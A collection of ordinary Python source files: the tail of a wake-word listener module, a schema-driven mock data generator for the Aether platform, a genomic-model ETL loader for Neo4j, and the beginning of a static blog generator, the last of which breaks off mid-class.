self.receivers.append(message.receiver or sender)
self.transition("listening")
if message.record:
self.send(self.recorder, StartStreaming(self.myAddress))
except Exception:
self._logger.exception("loading wake handle")
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, AudioData):
self.audio_buffer += message.data
num_chunks = len(self.audio_buffer) // self.chunk_size
if num_chunks > 0:
assert self.handle is not None
for _ in range(num_chunks):
chunk = self.audio_buffer[: self.chunk_size]
unpacked_chunk = struct.unpack_from(self.chunk_format, chunk)
self.audio_buffer = self.audio_buffer[self.chunk_size :]
# Process chunk
keyword_index = self.handle.process(unpacked_chunk)
if keyword_index:
if len(self.keyword_paths) == 1:
keyword_index = 0
wakeword_name = str(keyword_index)
if keyword_index < len(self.keyword_paths):
wakeword_name = self.keyword_paths[keyword_index].stem
# Pass downstream to receivers
self._logger.debug("Hotword detected (%s)", keyword_index)
result = WakeWordDetected(wakeword_name)
for receiver in self.receivers:
self.send(receiver, result)
elif isinstance(message, WakeWordDetected):
# Pass downstream to receivers
self._logger.debug("Hotword detected (%s)", message.name)
for receiver in self.receivers:
self.send(receiver, message)
elif isinstance(message, WakeWordNotDetected):
# Pass downstream to receivers
for receiver in self.receivers:
self.send(receiver, message)
elif isinstance(message, StopListeningForWakeWord):
if message.clear_all:
self.receivers.clear()
else:
try:
self.receivers.remove(message.receiver or sender)
except ValueError:
pass
if not self.receivers:
if message.record:
self.send(self.recorder, StopStreaming(self.myAddress))
if self.handle is not None:
self.handle.delete()
self.handle = None
self.transition("started")
elif isinstance(message, PauseListeningForWakeWord):
self.transition("paused")
def in_paused(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in paused state."""
if isinstance(message, ResumeListeningForWakeWord):
self.transition("listening")
def load_handle(self):
"""Load porcupine library."""
if self.handle is None:
for kw_path in self.keyword_paths:
assert kw_path.is_file(), f"Missing {kw_path}"
from porcupine import Porcupine
self.handle = Porcupine(
self.library_path,
self.model_path,
keyword_file_paths=[str(p) for p in self.keyword_paths],
sensitivities=self.sensitivities,
)
# 16-bit
self.chunk_size = self.handle.frame_length * 2
self.chunk_format = "h" * self.handle.frame_length
self._logger.debug(
"Loaded porcupine (keyword=%s). Expecting sample rate=%s, frame length=%s",
self.keyword_paths,
self.handle.sample_rate,
self.handle.frame_length,
)
# -----------------------------------------------------------------------------
# Command Wake Listener
# -----------------------------------------------------------------------------
class CommandWakeListener(RhasspyActor):
"""Command-line based wake word listener"""
def __init__(self):
RhasspyActor.__init__(self)
self.receivers: List[RhasspyActor] = []
self.wake_proc = None
self.command: List[str] = []
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
program = os.path.expandvars(self.profile.get("wake.command.program"))
arguments = [
os.path.expandvars(str(a))
for a in self.profile.get("wake.command.arguments", [])
]
self.command = [program] + arguments
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
if isinstance(message, ListenForWakeWord):
self.receivers.append(message.receiver or sender)
self.wake_proc = subprocess.Popen(self.command, stdout=subprocess.PIPE)
def post_result() -> None:
# STDOUT -> text
try:
out, _ = self.wake_proc.communicate()
wakeword_id = out.decode().strip()
except Exception:
wakeword_id = ""
self._logger.exception("post_result")
# Actor will forward
if wakeword_id:
self.send(self.myAddress, WakeWordDetected(wakeword_id))
else:
self.send(self.myAddress, WakeWordNotDetected(wakeword_id))
self.transition("listening")
# Wait for program in a separate thread
threading.Thread(target=post_result, daemon=True).start()
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, WakeWordDetected):
# Pass downstream to receivers
self._logger.debug("Hotword detected (%s)", message.name)
for receiver in self.receivers:
self.send(receiver, message)
elif isinstance(message, WakeWordNotDetected):
# Pass downstream to receivers
for receiver in self.receivers:
self.send(receiver, message)
elif isinstance(message, StopListeningForWakeWord):
if message.clear_all:
self.receivers.clear()
else:
try:
self.receivers.remove(message.receiver or sender)
except ValueError:
pass
if not self.receivers:
if self.wake_proc is not None:
self.wake_proc.terminate()
self.transition("started")
elif isinstance(message, PauseListeningForWakeWord):
self.transition("paused")
def in_paused(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in paused state."""
if isinstance(message, ResumeListeningForWakeWord):
self.transition("listening")
|
mocker.py
|
# Copyright (C) 2019 by eHealth Africa : http://www.eHealthAfrica.org
#
# See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
import signal
import string
from collections import namedtuple
from queue import Queue, Empty
from random import randint, uniform, choice, sample
from threading import Thread
from time import sleep
from uuid import uuid4
from aether.client import Client, AetherAPIException
from utils import LOGGER
class Generic(object):
'''
We keep our default mocking functions for each type here as generic
'''
@staticmethod
def boolean():
return choice([True, False])
@staticmethod
def float():
return uniform(.01, 1000.00)
@staticmethod
def int():
return randint(1, 99999)
@staticmethod
def null():
return None
@staticmethod
def string():
size = choice(range(3, 12))
return ''.join(sample(string.ascii_lowercase, size))
@staticmethod
def uuid():
return str(uuid4())
@staticmethod
def geo_lat():
return uniform(0.00000000000, 60.00000000000)
@staticmethod
def geo_lng():
return uniform(0.00000000000, 180.00000000000)
class DataMocker(object):
'''
An extensible tool that consumes an Avro Schema and creates junk data that matches it.
Data generation methods can be overridden on a per type [text, int, etc] basis via:
override_type(type_name, fn)
Override methods can also be passed on a property name basis [lat, lon, name] via:
override_property(property_name, fn)
'''
def __init__(self, name, schema, parent):
self.MAX_ARRAY_SIZE = 4
self.QUEUE_WORKERS = 10
self.REUSE_COEFFICIENT = 0.85
self.name = name
self.raw_schema = schema
self.parent = parent
self.subschema = {}
self.primitive_types = [
'null',
'boolean',
'int',
'long',
'float',
'double',
'bytes',
'string'
]
self.type_methods = {
primitive: MockFn(self._default(primitive))
for primitive in self.primitive_types
}
self.created = [] # ids of created entities
self.reuse = 0 # number of recycled entity ids
self.count = 0 # number of entity references to this type
self.property_methods = {}
self.required = []
self.ignored_properties = []
self.restricted_types = {}
self.instructions = {}
self.killed = False
self._queue = Queue()
self.__start_queue_process()
self.override_property('id', MockFn(Generic.uuid))
self.load()
def _default(self, primitive):
if primitive in ['int', 'long']:
return Generic.int
if primitive in ['float', 'double']:
return Generic.float
if primitive == 'null':
return Generic.null
if primitive == 'string':
return Generic.string
if primitive == 'boolean':
return Generic.boolean
def kill(self):
self.killed = True
def __start_queue_process(self):
for _ in range(self.QUEUE_WORKERS):
worker = Thread(target=self.__reference_runner, args=[])
worker.daemon = False
worker.start()
def __reference_runner(self):
while True:
if self.killed:
break
try:
fn = self._queue.get(block=True, timeout=1)
fn()
except Empty:
if self.killed:
break
sleep(1)
except Exception as err:
raise err
def get_reference(self, exclude=None):
# called from other types to generate this one (lazily)
# returns an ID, either of by registering a new instance
# or by returning a value from created
self.count += 1
thresh = 0 if self.count <= 100 else (100 * self.REUSE_COEFFICIENT)
new = (randint(0, 100) >= thresh)
if new:
_id = self.quick_reference()
else:
items = self.created[:-4]
if items:
self.reuse += 1
_id = choice(items)
else:
_id = self.quick_reference()
return _id
def quick_reference(self):
# generates an id for this type
# queues a job to actually make the instance
_id = None
if self.property_methods.get('id'):
fn = self.property_methods.get('id')
_id = fn()
else:
fn = [
fn
for name, fn in self.instructions.get(self.name)
if name == 'id'
]
if not fn:
raise ValueError("Couldn't find id function")
_id = fn[0]()
deffered_generation = MockFn(self.fullfill_reference, [_id])
self._queue.put(deffered_generation)
return _id
def fullfill_reference(self, _id):
# the method called from the queue to create an instance
new_record = self.get(set_id=_id)
self.parent.register(self.name, new_record)
return _id
def get(self, record_type='default', set_id=None):
# Creates a mock instance of this type
# wraps _get
if record_type == 'default':
body = self._get(self.name)
if set_id:
body['id'] = set_id
self.created.append(body.get('id'))
return body
else:
return self._get(record_type)
def _get(self, name):
# actually compiles the instruction set for this type and returns the body
instructions = self.instructions.get(name)
if not instructions:
alt = self.parent.names.get(name)
instructions = self.instructions.get(alt)
if not instructions:
raise ValueError('No instructions for type %s' % name)
return {name: fn() for name, fn in instructions}
def gen(self, avro_type):
# generation of avro types
return self.type_methods.get(avro_type)
def gen_array(self, avro_type):
# generation of an array of any type
fn = self.gen(avro_type)
return MockFn(self._gen_array, [fn])
def _gen_array(self, fn):
size = choice(range(2, self.MAX_ARRAY_SIZE))
return [fn() for i in range(size)]
def gen_random_type(self, name=None, avro_types=None):
avro_types = avro_types or []
return MockFn(self._gen_random_type, [name, avro_types])
def _gen_random_type(self, name, avro_types):
# picks on of the valid types available for the field and completes it
if name in self.required:
avro_types = [i for i in avro_types if i != 'null']
avro_type = choice(avro_types)
fn = None
if isinstance(avro_type, dict):
if avro_type.get('type', None) != 'array':
raise ValueError('unexpected type, %s' % avro_type.get('type'))
items = avro_type.get('items')
fn = self.gen_array(items)
return fn()
elif isinstance(avro_type, list):
if name in self.required:
avro_type = [i for i in avro_types if i != 'null']
avro_type = choice(avro_type)
if not avro_type in self.primitive_types:
fn = self.gen_complex(avro_type)
else:
fn = self.gen(avro_type)
return fn()
def gen_complex(self, avro_type):
return MockFn(self._gen_complex, avro_type)
def _gen_complex(self, name):
# handles generation of associated types
try:
return self._get(name)
except ValueError:
fn = self.gen('null')
return fn()
def gen_reference(self, name, avro_type, avro_types):
# gets a reference to a foreign type
# usually triggers creation via the other types get_reference()
return MockFn(self._gen_reference, [name, avro_type, avro_types])
def _gen_reference(self, name, avro_type, avro_types):
if name in self.required:
avro_types = [i for i in avro_types if i != 'null']
chosen = choice(avro_types)
if isinstance(chosen, str):
return self.parent.get_reference(avro_type)
else:
size = choice(range(2, self.MAX_ARRAY_SIZE))
return [self.get_reference(avro_type) for i in range(size)]
def ignore(self, property_name):
# turn off mocking for this property
self.ignored_properties.append(property_name)
def override_type(self, type_name, fn):
# provide an override method for an avro type
# fn is a MockFn object
self.type_methods[type_name] = fn
self.load()
def override_property(self, property_name, fn):
# overrides a property in this type by name with a new function
# for example instead of returning a random string for the name field, pick for a list
# fn is a MockFn object
self.property_methods[property_name] = fn
self.load()
def load(self):
# loads schema definition for this type
self.schema = json.loads(self.raw_schema)
if isinstance(self.schema, list):
for obj in self.schema:
self.parse(obj)
else:
self.parse(self.schema)
def parse(self, schema):
# looks at all the types called for
# matches simple types to type_methods
# stubs external calls to parent for linked types
name = schema.get('name')
instructions = []
fields = schema.get('fields', [])
for field in fields:
instructions.append(self._comprehend_field(field))
self.instructions[name] = instructions
for i in self.instructions[name]:
LOGGER.debug('Add instruction to %s : %s' % (name, i))
def _comprehend_field(self, field):
# picks apart an avro definition of a field and builds mocking functions
name = field.get('name')
if name in self.ignored_properties:
return (name, self.gen('null')) # Return null function and get out
try:
ref_type = field.get('jsonldPredicate').get('_id')
avro_types = field.get('type')
# This is a reference property # TODO THIS MIGHT WANT TO BE sub_type
return (name, self.gen_reference(name, ref_type, avro_types))
except Exception:
pass # This is simpler than checking to see if this is a dictionary?
if name in self.property_methods.keys():
# We have an explicit method for this
return (name, self.property_methods.get(name))
avro_types = field.get('type')
if isinstance(avro_types, str):
return (name, self.gen(avro_types)) # Single type for this field
if name in self.restricted_types.keys(): # we've limited the types we want to mock
avro_types = list(set(avro_types).union(
set(self.restricted_types.get(name))))
return tuple([name, self.gen_random_type(name, avro_types)])
def require(self, *property):
# Make a field never resolve to null (if null is an option)
if isinstance(property, list):
self.required.extend(property)
else:
self.required.append(property)
def restrict_type(self, property_name, allowable_types=None):
# some properties can be completed by multiple types of properties
# for example [null, int, string[]?].
# restrict_type allows you to chose a subset of the permitted types for mocking
allowable_types = allowable_types or []
self.restricted_types[property_name] = allowable_types
class MockFn(namedtuple('MockFn', ('fn', 'args'))):
# Function wrapper class containing fn and args
def __new__(cls, fn, args=None):
this = super(MockFn, cls).__new__(cls, fn, args)
return this
def __call__(self):
if self.args and not isinstance(self.args, list):
return self.fn(self.args)
try: # This lets us get very duck-type-y with the passed functions
return self.fn(*self.args) if self.args else self.fn()
except TypeError:
return self.fn(self.args)
class MockingManager(object):
def __init__(self, kernel_url, user, pw, log_level, realm, keycloak_url):
# connects to Aether and gets available schemas.
# constructs a DataMocker for each type
self.client = Client(kernel_url, user, pw,
log_level=log_level,
realm=realm,
keycloak_url=keycloak_url)
self.types = {}
self.alias = {}
self.names = {}
self.schema_decorator = {}
self.schema_id = {}
self.type_count = {}
signal.signal(signal.SIGTERM, self.kill)
signal.signal(signal.SIGINT, self.kill)
self.load()
def get(self, avro_type):
if not avro_type in self.types.keys():
msg = 'No schema for type %s' % (avro_type)
LOGGER.error(msg)
raise KeyError(msg)
return self.types.get(avro_type).get()
def get_reference(self, avro_type):
if not avro_type in self.types.keys():
msg = 'No schema for type %s' % (avro_type)
LOGGER.error(msg)
raise KeyError(msg)
return self.types.get(avro_type).get_reference()
def kill(self, *args, **kwargs):
for name, mocker in self.types.items():
LOGGER.info('Stopping thread for %s' % name)
mocker.kill()
def register(self, name, payload=None):
# register an entity of type 'name'
# if no payload is passed, an appropriate one will be created
count = self.type_count.get(name, 0)
count += 1
self.type_count[name] = count
if not payload:
payload = self.types[name].get()
# type_name = self.alias.get(name)
type_id = self.schema_id.get(name)
ps_id = self.schema_decorator.get(type_id)
data = self.payload_to_data(ps_id, payload)
try:
self.client.entities.create(data=data)
LOGGER.debug('Created instance # %s of type %s' % (self.type_count[name], name))
except AetherAPIException as err:
LOGGER.error('in creation of entity of type %s: %s' % (name, err))
return data
def payload_to_data(self, ps_id, payload):
# wraps data in expected aether jargon for submission
data = {
'id': payload['id'],
'payload': payload,
'schemadecorator': ps_id,
'status': 'Publishable'
}
return data
def load(self):
# loads schemas and project schemas from aether client
LOGGER.debug('Loading schemas from Aether Kernel')
for schema in self.client.schemas.paginated('list'):
name = schema.name
LOGGER.debug('Loading schema for type %s \n%s' % (name, schema))
_id = schema.id
definition = schema.definition
if isinstance(definition, str):
definition = json.loads(definition)
if isinstance(definition, list):
full_name = [
obj.get('name')
for obj in definition
if obj.get('name').endswith(name)
][0]
else:
full_name = definition.get('name')
namespace = definition.get('namespace')
if namespace and not name in namespace:
full_name = namespace + '.' + name
self.types[full_name] = DataMocker(full_name, json.dumps(definition), self)
self.names[name] = full_name
self.names[full_name] = name
self.types[name] = self.types[full_name]
self.alias[full_name] = name
self.alias[name] = full_name
self.schema_id[name] = _id
self.schema_id[full_name] = _id
self.schema_id[_id] = name
for ps in self.client.schemadecorators.paginated('list'):
schema_id = ps.schema
_id = ps.id
self.schema_decorator[schema_id] = _id
self.schema_decorator[_id] = schema_id
|
affected_genomic_model_etl.py
|
"""Affected Genomic Model ETL."""
import logging
import multiprocessing
from etl import ETL
from etl.helpers import TextProcessingHelper, ETLHelper
from files import JSONFile
from transactors import CSVTransactor, Neo4jTransactor
class AffectedGenomicModelETL(ETL):
"""ETL for adding Affected Genomic Model."""
logger = logging.getLogger(__name__)
# Query templates which take params and will be processed later
agm_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (s:Species {primaryKey: row.taxonId})
MERGE (o:AffectedGenomicModel {primaryKey:row.primaryId})
ON CREATE SET o.name = row.name,
o.nameText = row.nameText,
o.dateProduced = row.dateProduced,
o.release = row.release,
o.localId = row.localId,
o.globalId = row.globalId,
o.uuid = row.uuid,
o.modCrossRefCompleteUrl = row.modGlobalCrossRefUrl,
o.dataProviders = row.dataProviders,
o.dataProvider = row.dataProvider,
o.nameText = row.nameText,
o.nameTextWithSpecies = row.nameTextWithSpecies,
o.nameWithSpecies = row.nameWithSpecies,
o.subtype = row.subtype
MERGE (o)-[:FROM_SPECIES]-(s)
"""
agm_secondary_ids_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (f:AffectedGenomicModel {primaryKey:row.primaryId})
MERGE (second:SecondaryId:Identifier {primaryKey:row.secondaryId})
SET second.name = row.secondary_id
MERGE (f)-[aka1:ALSO_KNOWN_AS]->(second)
"""
agm_sqtrs_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (sqtr:SequenceTargetingReagent {primaryKey:row.sqtrId})
MATCH (agm:AffectedGenomicModel {primaryKey:row.primaryId})
MERGE (agm)-[:SEQUENCE_TARGETING_REAGENT]-(sqtr)
"""
agm_synonyms_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (a:AffectedGenomicModel {primaryKey:row.primaryId})
MERGE(syn:Synonym:Identifier {primaryKey:row.synonym})
SET syn.name = row.synonym
MERGE (a)-[aka2:ALSO_KNOWN_AS]->(syn)
"""
agm_backgrounds_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (agm:AffectedGenomicModel {primaryKey:row.primaryId})
MATCH (b:AffectedGenomicModel {primaryKey:row.backgroundId})
MERGE (agm)-[:BACKGROUND]-(b)
"""
agm_components_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (feature:Feature:Allele {primaryKey:row.componentId})
MATCH (agm:AffectedGenomicModel {primaryKey:row.primaryId})
MERGE (agm)-[agmf:MODEL_COMPONENT]-(feature)
SET agmf.zygosity = row.zygosityId
"""
def __init__(self, config):
"""Initialise object."""
super().__init__()
self.data_type_config = config
def _load_and_process_data(self):
thread_pool = []
for sub_type in self.data_type_config.get_sub_type_objects():
process = multiprocessing.Process(target=self._process_sub_type, args=(sub_type,))
process.start()
thread_pool.append(process)
ETL.wait_for_threads(thread_pool)
def _process_sub_type(self, sub_type):
self.logger.info("Loading Sequence Targeting Reagent Data: %s",
sub_type.get_data_provider())
filepath = sub_type.get_filepath()
self.logger.info(filepath)
data = JSONFile().get_data(filepath)
ETLHelper.load_release_info(data, sub_type, self.logger)
self.logger.info("Finished Loading Sequence Targeting Reagent Data: %s",
sub_type.get_data_provider())
if data is None:
self.logger.warning("No Data found for %s skipping", sub_type.get_data_provider())
return
# This order is the same as the lists yielded from the get_generators function.
# A list of tuples.
commit_size = self.data_type_config.get_neo4j_commit_size()
batch_size = self.data_type_config.get_generator_batch_size()
# This needs to be in this format (template, param1, params2) others will be ignored
query_template_list = [
[self.agm_query_template, commit_size,
"agm_data_" + sub_type.get_data_provider() + ".csv"],
[self.agm_secondary_ids_query_template, commit_size,
"agm_secondary_ids_" + sub_type.get_data_provider() + ".csv"],
[self.agm_synonyms_query_template, commit_size,
"agm_synonyms_" + sub_type.get_data_provider() + ".csv"],
[self.agm_components_query_template, commit_size,
"agm_components_" + sub_type.get_data_provider() + ".csv"],
[self.agm_sqtrs_query_template, commit_size,
"agm_sqtrs_" + sub_type.get_data_provider() + ".csv"],
[self.agm_backgrounds_query_template, commit_size,
"agm_backgrounds_" + sub_type.get_data_provider() + ".csv"]
]
# Obtain the generator
generators = self.get_generators(data, sub_type.get_data_provider(), batch_size)
query_and_file_list = self.process_query_params(query_template_list)
CSVTransactor.save_file_static(generators, query_and_file_list)
Neo4jTransactor.execute_query_batch(query_and_file_list)
self.error_messages("AGM-{}: ".format(sub_type.get_data_provider()))
def cross_ref_process(self, agm_record):
"""Get cross reference."""
cross_ref = ""
if 'crossReference' not in agm_record:
return cross_ref
cross_ref = agm_record.get('crossReference')
cross_ref_id = cross_ref.get('id')
local_crossref_id = cross_ref_id.split(":")[1]
prefix = cross_ref.get('id').split(":")[0]
pages = cross_ref.get('pages')
# some pages collection have 0 elements
if pages is not None and len(pages) > 0:
for page in pages:
if page in ['Fish', 'genotype', 'strain']:
cross_ref = self.etlh.rdh2.return_url_from_key_value(
prefix, local_crossref_id, alt_page=page)
return cross_ref
def agm_process(self, agms, agm_record, date_produced):
"""Process agms."""
# TODO: make subtype required in submission file.
subtype = agm_record.get('subtype')
if subtype is None and self.data_provider == 'WB':
subtype = 'strain'
if subtype is None:
subtype = 'affected_genomic_model'
global_id = agm_record['primaryID']
local_id = global_id.split(":")[1]
short_species_abbreviation = self.etlh.get_short_species_abbreviation(agm_record.get('taxonId'))
name_text = TextProcessingHelper.cleanhtml(agm_record.get('name'))
mod_global_cross_ref_url = self.cross_ref_process(agm_record)
load_key = date_produced + self.data_provider + "_agm"
# TODO: name_text
agm_dataset = {
"primaryId": agm_record.get('primaryID'),
"name": agm_record.get('name'),
"globalId": global_id,
"localId": local_id,
"taxonId": agm_record.get('taxonId'),
"dataProviders": self.data_providers,
"dateProduced": date_produced,
"loadKey": load_key,
"subtype": subtype,
"modGlobalCrossRefUrl": mod_global_cross_ref_url,
"dataProvider": self.data_provider,
"nameText": name_text,
"nameWithSpecies": agm_record.get('name') + " (" + short_species_abbreviation + ")",
"nameTextWithSpecies": name_text + " (" + short_species_abbreviation + ")",
}
agms.append(agm_dataset)
def genmod_process(self, components, agm_record):
"""Process affected genomic Model components."""
if agm_record.get('affectedGenomicModelComponents') is None:
return
for component in agm_record.get('affectedGenomicModelComponents'):
component_dataset = {
"primaryId": agm_record.get('primaryID'),
"componentId": component.get('alleleID'),
"zygosityId": component.get('zygosity')
}
components.append(component_dataset)
def ppids_process(self, backgrounds, agm_record):
"""Parental Pop Ids process."""
if agm_record.get('parentalPopulationIDs') is None:
return
for background in agm_record.get('parentalPopulationIDs'):
background_dataset = {
"primaryId": agm_record.get('primaryID'),
"backgroundId": background
}
backgrounds.append(background_dataset)
def sqtr_process(self, sqtrs, agm_record):
"""Get sqtrs."""
if agm_record.get('sequenceTargetingReagentIDs') is None:
return
for sqtr in agm_record.get('sequenceTargetingReagentIDs'):
sqtr_dataset = {
"primaryId": agm_record.get('primaryID'),
"sqtrId": sqtr
}
sqtrs.append(sqtr_dataset)
def secondary_process(self, secondarys, data_record):
"""Get secondary ids.
secondarys: list of dataset items.
data_record: record to process.
"""
if data_record.get('secondaryIds') is None:
return
for sid in data_record.get('secondaryIds'):
secondary_id_dataset = {
"primaryId": data_record.get('primaryID'),
"secondaryId": sid
}
secondarys.append(secondary_id_dataset)
def synonyms_process(self, synonyms, data_record):
"""Get synonyms."""
if data_record.get('synonyms') is None:
return
for syn in data_record.get('synonyms'):
syn_dataset = {
"primaryId": data_record.get('primaryID'),
"synonym": syn.strip()
}
synonyms.append(syn_dataset)
def get_generators(self, agm_data, data_provider, batch_size):
"""Get Generators."""
agms = []
agm_synonyms = []
agm_secondary_ids = []
components = []
backgrounds = []
sqtrs = []
counter = 0
date_produced = agm_data['metaData']['dateProduced']
self.data_providers_process(agm_data)
for agm_record in agm_data['data']:
counter = counter + 1
global_id = agm_record['primaryID']
if self.test_object.using_test_data() is True:
is_it_test_entry = self.test_object.check_for_test_id_entry(global_id)
if is_it_test_entry is False:
counter = counter - 1
continue
self.secondary_process(agm_secondary_ids, agm_record)
self.synonyms_process(agm_synonyms, agm_record)
self.agm_process(agms, agm_record, date_produced)
self.genmod_process(components, agm_record)
self.sqtr_process(sqtrs, agm_record)
self.ppids_process(backgrounds, agm_record)
if counter == batch_size:
yield [agms, agm_secondary_ids, agm_synonyms, components, sqtrs, backgrounds]
agms = []
agm_secondary_ids = []
agm_synonyms = []
components = []
backgrounds = []
counter = 0
if counter > 0:
yield [agms, agm_secondary_ids, agm_synonyms, components, sqtrs, backgrounds]
|
mirage.py
|
#!/usr/bin/env python
import argh
import shutil
import os
import posixpath
import http.server
import socketserver
import threading
import time
import uglipyjs
import urllib.request, urllib.parse, urllib.error
import webbrowser
import yaml
from csscompressor import compress
from libcloud.storage.types import Provider, ContainerDoesNotExistError
from libcloud.storage.providers import get_driver
from markdown import markdown
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
from src.cnsl import cnsl
try:
with open("config.yml") as config_yml:
config = yaml.load(config_yml.read())
except Exception as e:
config = {}
# Set up directory structure
blog_root = os.path.dirname(__file__)
posts_dir = os.path.join(blog_root, "posts")
pages_dir = os.path.join(blog_root, "pages")
resources_dir = os.path.join(blog_root, "resources")
build_dir = os.path.join(blog_root, "site")
build_posts_dir = os.path.join(build_dir, "posts")
build_resources_dir = os.path.join(build_dir, "resources")
def chunks(l, n):
"""
Yield successive n-sized chunks from l. Used for pagination.
http://stackoverflow.com/a/312464/319618
"""
for i in range(0, len(l), n):
yield l[i:i + n]
def load_posts(directory, mode="post"):
for filename in os.listdir(directory):
post_filename = os.path.join(directory, filename)
with open(post_filename) as post_file:
split_filename = os.path.splitext(filename)
if len(split_filename) == 2 and split_filename[1] == ".md":
if split_filename[0].lower().endswith("_draft"):
cnsl.warn("Skipping draft file {}".format(filename))
continue
cnsl.ok("Compiling {} {}".format(mode, filename))
post_slug = split_filename[0].lower().replace(" ", "-")
new_filename = os.path.join(post_slug, "index.html")
url = "/" + \
os.path.join(
"posts", post_slug) if mode == "post" else "/" + post_slug
content = markdown(post_file.read())
yield {
'filename': new_filename,
'url': url,
'post-title': split_filename[0],
'content': content,
'date': time.ctime(os.path.getctime(post_filename))
}
else:
cnsl.warn("Ignoring file " + filename)
def write_posts(base_dir, posts, templates):
for post in posts:
full_path = os.path.join(base_dir, post['filename'])
os.makedirs(os.path.split(full_path)[0])
with open(full_path, "w") as published:
cnsl.success("Writing post " + post['filename'])
write_template(published, post, templates)
def render_post(template, post):
return (template
.replace("{{content}}", post["content"])
.replace("{{permalink}}", post["url"])
.replace("{{post-title}}", post["post-title"])
.replace("{{post-date}}", post["date"]))
def write_template(file, post, templates):
file.write(templates["base"]
.replace("{{posts}}", render_post(templates["post"], post))
.replace("{{pagination}}", ""))
def page_url(n):
return "/" if n == 1 else "/" + str(n)
def render_pages(total_pages, current_page):
if total_pages == 1:
return ''
pages_string = '<a href="{}">< Newer</a> • '.format(
page_url(current_page - 1)) if current_page > 1 else ''
for i in range(1, total_pages + 1):
if current_page == i:
pages_string += str(i) + " "
else:
pages_string += '<a href="{}">{}</a> '.format(page_url(i), i)
pages_string += ' • <a href="{}">Older ></a>'.format(
page_url(current_page + 1)) if current_page < total_pages else ''
return pages_string
def move_resource(file, filename, filetype, compile_function=lambda x: x):
split_filename = os.path.splitext(filename)
if split_filename[0][-4:] == ".min":
new_filename = filename
else:
new_filename = split_filename[0] + ".min." + filetype
mode = "wb" if filetype == "js" else "w"
with open(os.path.join(build_resources_dir, filetype, new_filename), mode) as published:
if split_filename[0][-4:] == ".min":
cnsl.success("Copying minified {} file: {}".format(filetype, filename))
published.write(file.read())
else:
cnsl.success("Minifying {} file: {}".format(filetype, filename))
published.write(compile_function(file.read()))
return new_filename
def move_image(file, filename):
with open(os.path.join(build_resources_dir, "img", filename), "wb") as published:
cnsl.success("Copying image file: {}".format(filename))
published.write(file.read())
def compile():
"""
Compile the blog, outputting the result into /site.
"""
cnsl.ok("Compiling blog")
try:
shutil.rmtree(build_dir)
except:
pass
os.mkdir(build_dir)
os.mkdir(build_posts_dir)
os.mkdir(build_resources_dir)
os.mkdir(os.path.join(build_resources_dir, "css"))
os.mkdir(os.path.join(build_resources_dir, "js"))
os.mkdir(os.path.join(build_resources_dir, "img"))
templates = {}
for filename in os.listdir(os.path.join(blog_root, "templates")):
split_filename = os.path.splitext(filename)
with open(os.path.join(blog_root, "templates", filename)) as template_file:
cnsl.ok("Loading template {}".format(filename))
templates[split_filename[0]] = template_file.read()
if "base" in templates and "post" in templates:
cnsl.success("All required templates found")
else:
cnsl.error("Missing templates")
return
# Compile and minify resources
resources = {
"js": [],
"css": []
}
for root, dirs, files in os.walk(resources_dir):
for filename in files:
split_filename = os.path.splitext(filename)
ext = split_filename[1].lower()
if len(split_filename) == 2:
if ext[1:] in ["jpg", "jpeg", "png", "gif"]:
with open(os.path.join(root, filename), "rb") as resource_file:
move_image(resource_file, filename)
elif ext == ".css":
with open(os.path.join(root, filename), "r") as resource_file:
resources["css"].append(
move_resource(resource_file, filename, "css", compress))
else:
with open(os.path.join(root, filename)) as resource_file:
if ext == ".js":
resources["js"].append(
move_resource(resource_file, filename, "js", uglipyjs.compile))
else:
cnsl.warn("Don't know what to do with file {}".format(filename))
# Generate style resources
style_headers = ''.join(['<link href="/resources/css/{}" rel="stylesheet">'.format(name)
for name in resources["css"]])
# Generate script resources
script_headers = ''.join(['<script src="/resources/js/{}"></script>'.format(name)
for name in resources["js"]])
# Update base template
templates["base"] = templates["base"].replace(
"{{styles}}", style_headers).replace(
"{{scripts}}", script_headers).replace(
"{{title}}", config["blog-title"]).replace(
"{{subtitle}}", config["blog-subtitle"])
# Compile posts and pages
pages = list(load_posts(pages_dir, mode="page"))
posts = list(load_posts(posts_dir, mode="post"))
# update pages links on base template
pages_links = ''.join(['<li class="page-link"><a class="pure-button" href="{}">{}</a></li>'
.format(page["url"], page["post-title"]) for page in pages])
templates["base"] = templates["base"].replace("{{pages}}", pages_links)
# write out pages files
write_posts(build_dir, pages, templates)
write_posts(build_posts_dir, posts, templates)
# Make a list of recent posts
posts.sort(key=lambda x: x["date"], reverse=True)
cs = list(chunks(posts, 10))
i = 1
for chunk in cs:
posts_chunk = ''.join(
[render_post(templates["post"], post) for post in chunk])
# Write out index file
if i == 1:
filename = "index.html"
else:
filename = os.path.join(str(i), "index.html")
os.makedirs(os.path.join(build_dir, str(i)))
with open(os.path.join(build_dir, filename), "w") as index_file:
index_file.write(templates["base"]
.replace("{{posts}}", posts_chunk)
.replace("{{pagination}}", render_pages(len(cs), i)))
cnsl.success("Wrote index file")
i += 1
class ReloadHandler(FileSystemEventHandler):
def on_modified(self, event):
split_filename = os.path.splitext(event.src_path)
